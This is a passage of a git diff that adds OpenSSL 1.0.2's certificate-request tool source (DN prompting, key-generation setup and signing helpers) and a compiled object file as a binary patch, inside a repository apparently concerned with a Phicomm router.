+                    int attribs, unsigned long chtype)
+{
+    int ret = 0, i;
+    char no_prompt = 0;
+    STACK_OF(CONF_VALUE) *dn_sk, *attr_sk = NULL;
+    char *tmp, *dn_sect, *attr_sect;
+
+    tmp = NCONF_get_string(req_conf, SECTION, PROMPT);
+    if (tmp == NULL)
+        ERR_clear_error();
+    if ((tmp != NULL) && !strcmp(tmp, "no"))
+        no_prompt = 1;
+
+    dn_sect = NCONF_get_string(req_conf, SECTION, DISTINGUISHED_NAME);
+    if (dn_sect == NULL) {
+        BIO_printf(bio_err, "unable to find '%s' in config\n",
+                   DISTINGUISHED_NAME);
+        goto err;
+    }
+    dn_sk = NCONF_get_section(req_conf, dn_sect);
+    if (dn_sk == NULL) {
+        BIO_printf(bio_err, "unable to get '%s' section\n", dn_sect);
+        goto err;
+    }
+
+    attr_sect = NCONF_get_string(req_conf, SECTION, ATTRIBUTES);
+    if (attr_sect == NULL) {
+        ERR_clear_error();
+        attr_sk = NULL;
+    } else {
+        attr_sk = NCONF_get_section(req_conf, attr_sect);
+        if (attr_sk == NULL) {
+            BIO_printf(bio_err, "unable to get '%s' section\n", attr_sect);
+            goto err;
+        }
+    }
+
+    /* setup version number */
+    if (!X509_REQ_set_version(req, 0L))
+        goto err;               /* version 1 */
+
+    if (no_prompt)
+        i = auto_info(req, dn_sk, attr_sk, attribs, chtype);
+    else {
+        if (subj)
+            i = build_subject(req, subj, chtype, multirdn);
+        else
+            i = prompt_info(req, dn_sk, dn_sect, attr_sk, attr_sect, attribs,
+                            chtype);
+    }
+    if (!i)
+        goto err;
+
+    if (!X509_REQ_set_pubkey(req, pkey))
+        goto err;
+
+    ret = 1;
+ err:
+    return (ret);
+}
+
+/*
+ * subject is expected to be in the format /type0=value0/type1=value1/type2=...
+ * where characters may be escaped by \
+ */
+static int build_subject(X509_REQ *req, char *subject, unsigned long chtype,
+                         int multirdn)
+{
+    X509_NAME *n;
+
+    if (!(n = parse_name(subject, chtype, multirdn)))
+        return 0;
+
+    if (!X509_REQ_set_subject_name(req, n)) {
+        X509_NAME_free(n);
+        return 0;
+    }
+    X509_NAME_free(n);
+    return 1;
+}
+
+static int prompt_info(X509_REQ *req,
+                       STACK_OF(CONF_VALUE) *dn_sk, char *dn_sect,
+                       STACK_OF(CONF_VALUE) *attr_sk, char *attr_sect,
+                       int attribs, unsigned long chtype)
+{
+    int i;
+    char *p, *q;
+    char buf[100];
+    int nid, mval;
+    long n_min, n_max;
+    char *type, *value;
+    const char *def;
+    CONF_VALUE *v;
+    X509_NAME *subj;
+    subj = X509_REQ_get_subject_name(req);
+
+    if (!batch) {
+        BIO_printf(bio_err,
+                   "You are about to be asked to enter information that will be incorporated\n");
+        BIO_printf(bio_err, "into your certificate request.\n");
+        BIO_printf(bio_err,
+                   "What you are about to enter is what is called a Distinguished Name or a DN.\n");
+        BIO_printf(bio_err,
+                   "There are quite a few fields but you can leave some blank\n");
+        BIO_printf(bio_err,
+                   "For some fields there will be a default value,\n");
+        BIO_printf(bio_err,
+                   "If you enter '.', the field will be left blank.\n");
+        BIO_printf(bio_err, "-----\n");
+    }
+
+    if (sk_CONF_VALUE_num(dn_sk)) {
+        i = -1;
+ start:for (;;) {
+            i++;
+            if (sk_CONF_VALUE_num(dn_sk) <= i)
+                break;
+
+            v = sk_CONF_VALUE_value(dn_sk, i);
+            p = q = NULL;
+            type = v->name;
+            if (!check_end(type, "_min") || !check_end(type, "_max") ||
+                !check_end(type, "_default") || !check_end(type, "_value"))
+                continue;
+            /*
+             * Skip past any leading X. X: X, etc to allow for multiple
+             * instances
+             */
+            for (p = v->name; *p; p++)
+                if ((*p == ':') || (*p == ',') || (*p == '.')) {
+                    p++;
+                    if (*p)
+                        type = p;
+                    break;
+                }
+            if (*type == '+') {
+                mval = -1;
+                type++;
+            } else
+                mval = 0;
+            /* If OBJ not recognised ignore it */
+            if ((nid = OBJ_txt2nid(type)) == NID_undef)
+                goto start;
+            if (BIO_snprintf(buf, sizeof buf, "%s_default", v->name)
+                >= (int)sizeof(buf)) {
+                BIO_printf(bio_err, "Name '%s' too long\n", v->name);
+                return 0;
+            }
+
+            if ((def = NCONF_get_string(req_conf, dn_sect, buf)) == NULL) {
+                ERR_clear_error();
+                def = "";
+            }
+
+            BIO_snprintf(buf, sizeof buf, "%s_value", v->name);
+            if ((value = NCONF_get_string(req_conf, dn_sect, buf)) == NULL) {
+                ERR_clear_error();
+                value = NULL;
+            }
+
+            BIO_snprintf(buf, sizeof buf, "%s_min", v->name);
+            if (!NCONF_get_number(req_conf, dn_sect, buf, &n_min)) {
+                ERR_clear_error();
+                n_min = -1;
+            }
+
+            BIO_snprintf(buf, sizeof buf, "%s_max", v->name);
+            if (!NCONF_get_number(req_conf, dn_sect, buf, &n_max)) {
+                ERR_clear_error();
+                n_max = -1;
+            }
+
+            if (!add_DN_object(subj, v->value, def, value, nid,
+                               n_min, n_max, chtype, mval))
+                return 0;
+        }
+        if (X509_NAME_entry_count(subj) == 0) {
+            BIO_printf(bio_err,
+                       "error, no objects specified in config file\n");
+            return 0;
+        }
+
+        if (attribs) {
+            if ((attr_sk != NULL) && (sk_CONF_VALUE_num(attr_sk) > 0)
+                && (!batch)) {
+                BIO_printf(bio_err,
+                           "\nPlease enter the following 'extra' attributes\n");
+                BIO_printf(bio_err,
+                           "to be sent with your certificate request\n");
+            }
+
+            i = -1;
+ start2:   for (;;) {
+                i++;
+                if ((attr_sk == NULL) || (sk_CONF_VALUE_num(attr_sk) <= i))
+                    break;
+
+                v = sk_CONF_VALUE_value(attr_sk, i);
+                type = v->name;
+                if ((nid = OBJ_txt2nid(type)) == NID_undef)
+                    goto start2;
+
+                if (BIO_snprintf(buf, sizeof buf, "%s_default", type)
+                    >= (int)sizeof(buf)) {
+                    BIO_printf(bio_err, "Name '%s' too long\n", v->name);
+                    return 0;
+                }
+
+                if ((def = NCONF_get_string(req_conf, attr_sect, buf))
+                    == NULL) {
+                    ERR_clear_error();
+                    def = "";
+                }
+
+                BIO_snprintf(buf, sizeof buf, "%s_value", type);
+                if ((value = NCONF_get_string(req_conf, attr_sect, buf))
+                    == NULL) {
+                    ERR_clear_error();
+                    value = NULL;
+                }
+
+                BIO_snprintf(buf, sizeof buf, "%s_min", type);
+                if (!NCONF_get_number(req_conf, attr_sect, buf, &n_min)) {
+                    ERR_clear_error();
+                    n_min = -1;
+                }
+
+                BIO_snprintf(buf, sizeof buf, "%s_max", type);
+                if (!NCONF_get_number(req_conf, attr_sect, buf, &n_max)) {
+                    ERR_clear_error();
+                    n_max = -1;
+                }
+
+                if (!add_attribute_object(req,
+                                          v->value, def, value, nid, n_min,
+                                          n_max, chtype))
+                    return 0;
+            }
+        }
+    } else {
+        BIO_printf(bio_err, "No template, please set one up.\n");
+        return 0;
+    }
+
+    return 1;
+
+}
+
+static int auto_info(X509_REQ *req, STACK_OF(CONF_VALUE) *dn_sk,
+                     STACK_OF(CONF_VALUE) *attr_sk, int attribs,
+                     unsigned long chtype)
+{
+    int i;
+    char *p, *q;
+    char *type;
+    CONF_VALUE *v;
+    X509_NAME *subj;
+
+    subj = X509_REQ_get_subject_name(req);
+
+    for (i = 0; i < sk_CONF_VALUE_num(dn_sk); i++) {
+        int mval;
+        v = sk_CONF_VALUE_value(dn_sk, i);
+        p = q = NULL;
+        type = v->name;
+        /*
+         * Skip past any leading X. X: X, etc to allow for multiple instances
+         */
+        for (p = v->name; *p; p++)
+#ifndef CHARSET_EBCDIC
+            if ((*p == ':') || (*p == ',') || (*p == '.')) {
+#else
+            if ((*p == os_toascii[':']) || (*p == os_toascii[','])
+                || (*p == os_toascii['.'])) {
+#endif
+                p++;
+                if (*p)
+                    type = p;
+                break;
+            }
+#ifndef CHARSET_EBCDIC
+        if (*p == '+')
+#else
+        if (*p == os_toascii['+'])
+#endif
+        {
+            p++;
+            mval = -1;
+        } else
+            mval = 0;
+        if (!X509_NAME_add_entry_by_txt(subj, type, chtype,
+                                        (unsigned char *)v->value, -1, -1,
+                                        mval))
+            return 0;
+
+    }
+
+    if (!X509_NAME_entry_count(subj)) {
+        BIO_printf(bio_err, "error, no objects specified in config file\n");
+        return 0;
+    }
+    if (attribs) {
+        for (i = 0; i < sk_CONF_VALUE_num(attr_sk); i++) {
+            v = sk_CONF_VALUE_value(attr_sk, i);
+            if (!X509_REQ_add1_attr_by_txt(req, v->name, chtype,
+                                           (unsigned char *)v->value, -1))
+                return 0;
+        }
+    }
+    return 1;
+}
+
+static int add_DN_object(X509_NAME *n, char *text, const char *def,
+                         char *value, int nid, int n_min, int n_max,
+                         unsigned long chtype, int mval)
+{
+    int i, ret = 0;
+    MS_STATIC char buf[1024];
+ start:
+    if (!batch)
+        BIO_printf(bio_err, "%s [%s]:", text, def);
+    (void)BIO_flush(bio_err);
+    if (value != NULL) {
+        BUF_strlcpy(buf, value, sizeof buf);
+        BUF_strlcat(buf, "\n", sizeof buf);
+        BIO_printf(bio_err, "%s\n", value);
+    } else {
+        buf[0] = '\0';
+        if (!batch) {
+            if (!fgets(buf, sizeof buf, stdin))
+                return 0;
+        } else {
+            buf[0] = '\n';
+            buf[1] = '\0';
+        }
+    }
+
+    if (buf[0] == '\0')
+        return (0);
+    else if (buf[0] == '\n') {
+        if ((def == NULL) || (def[0] == '\0'))
+            return (1);
+        BUF_strlcpy(buf, def, sizeof buf);
+        BUF_strlcat(buf, "\n", sizeof buf);
+    } else if ((buf[0] == '.') && (buf[1] == '\n'))
+        return (1);
+
+    i = strlen(buf);
+    if (buf[i - 1] != '\n') {
+        BIO_printf(bio_err, "weird input :-(\n");
+        return (0);
+    }
+    buf[--i] = '\0';
+#ifdef CHARSET_EBCDIC
+    ebcdic2ascii(buf, buf, i);
+#endif
+    if (!req_check_len(i, n_min, n_max)) {
+        if (batch || value)
+            return 0;
+        goto start;
+    }
+
+    if (!X509_NAME_add_entry_by_NID(n, nid, chtype,
+                                    (unsigned char *)buf, -1, -1, mval))
+        goto err;
+    ret = 1;
+ err:
+    return (ret);
+}
+
+static int add_attribute_object(X509_REQ *req, char *text, const char *def,
+                                char *value, int nid, int n_min,
+                                int n_max, unsigned long chtype)
+{
+    int i;
+    static char buf[1024];
+
+ start:
+    if (!batch)
+        BIO_printf(bio_err, "%s [%s]:", text, def);
+    (void)BIO_flush(bio_err);
+    if (value != NULL) {
+        BUF_strlcpy(buf, value, sizeof buf);
+        BUF_strlcat(buf, "\n", sizeof buf);
+        BIO_printf(bio_err, "%s\n", value);
+    } else {
+        buf[0] = '\0';
+        if (!batch) {
+            if (!fgets(buf, sizeof buf, stdin))
+                return 0;
+        } else {
+            buf[0] = '\n';
+            buf[1] = '\0';
+        }
+    }
+
+    if (buf[0] == '\0')
+        return (0);
+    else if (buf[0] == '\n') {
+        if ((def == NULL) || (def[0] == '\0'))
+            return (1);
+        BUF_strlcpy(buf, def, sizeof buf);
+        BUF_strlcat(buf, "\n", sizeof buf);
+    } else if ((buf[0] == '.') && (buf[1] == '\n'))
+        return (1);
+
+    i = strlen(buf);
+    if (buf[i - 1] != '\n') {
+        BIO_printf(bio_err, "weird input :-(\n");
+        return (0);
+    }
+    buf[--i] = '\0';
+#ifdef CHARSET_EBCDIC
+    ebcdic2ascii(buf, buf, i);
+#endif
+    if (!req_check_len(i, n_min, n_max)) {
+        if (batch || value)
+            return 0;
+        goto start;
+    }
+
+    if (!X509_REQ_add1_attr_by_NID(req, nid, chtype,
+                                   (unsigned char *)buf, -1)) {
+        BIO_printf(bio_err, "Error adding attribute\n");
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    return (1);
+ err:
+    return (0);
+}
+
+static int req_check_len(int len, int n_min, int n_max)
+{
+    if ((n_min > 0) && (len < n_min)) {
+        BIO_printf(bio_err,
+                   "string is too short, it needs to be at least %d bytes long\n",
+                   n_min);
+        return (0);
+    }
+    if ((n_max >= 0) && (len > n_max)) {
+        BIO_printf(bio_err,
+                   "string is too long, it needs to be less than  %d bytes long\n",
+                   n_max);
+        return (0);
+    }
+    return (1);
+}
+
+/* Check if the end of a string matches 'end' */
+static int check_end(const char *str, const char *end)
+{
+    int elen, slen;
+    const char *tmp;
+    elen = strlen(end);
+    slen = strlen(str);
+    if (elen > slen)
+        return 1;
+    tmp = str + slen - elen;
+    return strcmp(tmp, end);
+}
+
+static EVP_PKEY_CTX *set_keygen_ctx(BIO *err, const char *gstr,
+                                    int *pkey_type, long *pkeylen,
+                                    char **palgnam, ENGINE *keygen_engine)
+{
+    EVP_PKEY_CTX *gctx = NULL;
+    EVP_PKEY *param = NULL;
+    long keylen = -1;
+    BIO *pbio = NULL;
+    const char *paramfile = NULL;
+
+    if (gstr == NULL) {
+        *pkey_type = EVP_PKEY_RSA;
+        keylen = *pkeylen;
+    } else if (gstr[0] >= '0' && gstr[0] <= '9') {
+        *pkey_type = EVP_PKEY_RSA;
+        keylen = atol(gstr);
+        *pkeylen = keylen;
+    } else if (!strncmp(gstr, "param:", 6))
+        paramfile = gstr + 6;
+    else {
+        const char *p = strchr(gstr, ':');
+        int len;
+        ENGINE *tmpeng;
+        const EVP_PKEY_ASN1_METHOD *ameth;
+
+        if (p)
+            len = p - gstr;
+        else
+            len = strlen(gstr);
+        /*
+         * The lookup of a the string will cover all engines so keep a note
+         * of the implementation.
+         */
+
+        ameth = EVP_PKEY_asn1_find_str(&tmpeng, gstr, len);
+
+        if (!ameth) {
+            BIO_printf(err, "Unknown algorithm %.*s\n", len, gstr);
+            return NULL;
+        }
+
+        EVP_PKEY_asn1_get0_info(NULL, pkey_type, NULL, NULL, NULL, ameth);
+#ifndef OPENSSL_NO_ENGINE
+        if (tmpeng)
+            ENGINE_finish(tmpeng);
+#endif
+        if (*pkey_type == EVP_PKEY_RSA) {
+            if (p) {
+                keylen = atol(p + 1);
+                *pkeylen = keylen;
+            } else
+                keylen = *pkeylen;
+        } else if (p)
+            paramfile = p + 1;
+    }
+
+    if (paramfile) {
+        pbio = BIO_new_file(paramfile, "r");
+        if (!pbio) {
+            BIO_printf(err, "Can't open parameter file %s\n", paramfile);
+            return NULL;
+        }
+        param = PEM_read_bio_Parameters(pbio, NULL);
+
+        if (!param) {
+            X509 *x;
+            (void)BIO_reset(pbio);
+            x = PEM_read_bio_X509(pbio, NULL, NULL, NULL);
+            if (x) {
+                param = X509_get_pubkey(x);
+                X509_free(x);
+            }
+        }
+
+        BIO_free(pbio);
+
+        if (!param) {
+            BIO_printf(err, "Error reading parameter file %s\n", paramfile);
+            return NULL;
+        }
+        if (*pkey_type == -1)
+            *pkey_type = EVP_PKEY_id(param);
+        else if (*pkey_type != EVP_PKEY_base_id(param)) {
+            BIO_printf(err, "Key Type does not match parameters\n");
+            EVP_PKEY_free(param);
+            return NULL;
+        }
+    }
+
+    if (palgnam) {
+        const EVP_PKEY_ASN1_METHOD *ameth;
+        ENGINE *tmpeng;
+        const char *anam;
+        ameth = EVP_PKEY_asn1_find(&tmpeng, *pkey_type);
+        if (!ameth) {
+            BIO_puts(err, "Internal error: can't find key algorithm\n");
+            return NULL;
+        }
+        EVP_PKEY_asn1_get0_info(NULL, NULL, NULL, NULL, &anam, ameth);
+        *palgnam = BUF_strdup(anam);
+#ifndef OPENSSL_NO_ENGINE
+        if (tmpeng)
+            ENGINE_finish(tmpeng);
+#endif
+    }
+
+    if (param) {
+        gctx = EVP_PKEY_CTX_new(param, keygen_engine);
+        *pkeylen = EVP_PKEY_bits(param);
+        EVP_PKEY_free(param);
+    } else
+        gctx = EVP_PKEY_CTX_new_id(*pkey_type, keygen_engine);
+
+    if (!gctx) {
+        BIO_puts(err, "Error allocating keygen context\n");
+        ERR_print_errors(err);
+        return NULL;
+    }
+
+    if (EVP_PKEY_keygen_init(gctx) <= 0) {
+        BIO_puts(err, "Error initializing keygen context\n");
+        ERR_print_errors(err);
+        return NULL;
+    }
+#ifndef OPENSSL_NO_RSA
+    if ((*pkey_type == EVP_PKEY_RSA) && (keylen != -1)) {
+        if (EVP_PKEY_CTX_set_rsa_keygen_bits(gctx, keylen) <= 0) {
+            BIO_puts(err, "Error setting RSA keysize\n");
+            ERR_print_errors(err);
+            EVP_PKEY_CTX_free(gctx);
+            return NULL;
+        }
+    }
+#endif
+
+    return gctx;
+}
+
+static int genpkey_cb(EVP_PKEY_CTX *ctx)
+{
+    char c = '*';
+    BIO *b = EVP_PKEY_CTX_get_app_data(ctx);
+    int p;
+    p = EVP_PKEY_CTX_get_keygen_info(ctx, 0);
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    BIO_write(b, &c, 1);
+    (void)BIO_flush(b);
+#ifdef LINT
+    p = n;
+#endif
+    return 1;
+}
+
+static int do_sign_init(BIO *err, EVP_MD_CTX *ctx, EVP_PKEY *pkey,
+                        const EVP_MD *md, STACK_OF(OPENSSL_STRING) *sigopts)
+{
+    EVP_PKEY_CTX *pkctx = NULL;
+    int i;
+    EVP_MD_CTX_init(ctx);
+    if (!EVP_DigestSignInit(ctx, &pkctx, md, NULL, pkey))
+        return 0;
+    for (i = 0; i < sk_OPENSSL_STRING_num(sigopts); i++) {
+        char *sigopt = sk_OPENSSL_STRING_value(sigopts, i);
+        if (pkey_ctrl_string(pkctx, sigopt) <= 0) {
+            BIO_printf(err, "parameter error \"%s\"\n", sigopt);
+            ERR_print_errors(bio_err);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+int do_X509_sign(BIO *err, X509 *x, EVP_PKEY *pkey, const EVP_MD *md,
+                 STACK_OF(OPENSSL_STRING) *sigopts)
+{
+    int rv;
+    EVP_MD_CTX mctx;
+    EVP_MD_CTX_init(&mctx);
+    rv = do_sign_init(err, &mctx, pkey, md, sigopts);
+    if (rv > 0)
+        rv = X509_sign_ctx(x, &mctx);
+    EVP_MD_CTX_cleanup(&mctx);
+    return rv > 0 ? 1 : 0;
+}
+
+int do_X509_REQ_sign(BIO *err, X509_REQ *x, EVP_PKEY *pkey, const EVP_MD *md,
+                     STACK_OF(OPENSSL_STRING) *sigopts)
+{
+    int rv;
+    EVP_MD_CTX mctx;
+    EVP_MD_CTX_init(&mctx);
+    rv = do_sign_init(err, &mctx, pkey, md, sigopts);
+    if (rv > 0)
+        rv = X509_REQ_sign_ctx(x, &mctx);
+    EVP_MD_CTX_cleanup(&mctx);
+    return rv > 0 ? 1 : 0;
+}
+
+int do_X509_CRL_sign(BIO *err, X509_CRL *x, EVP_PKEY *pkey, const EVP_MD *md,
+                     STACK_OF(OPENSSL_STRING) *sigopts)
+{
+    int rv;
+    EVP_MD_CTX mctx;
+    EVP_MD_CTX_init(&mctx);
+    rv = do_sign_init(err, &mctx, pkey, md, sigopts);
+    if (rv > 0)
+        rv = X509_CRL_sign_ctx(x, &mctx);
+    EVP_MD_CTX_cleanup(&mctx);
+    return rv > 0 ? 1 : 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.o
new file mode 100644
index 0000000000000000000000000000000000000000..96d81317ae40f7471776742ef5415281eb869a32
GIT binary patch
literal 49824
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
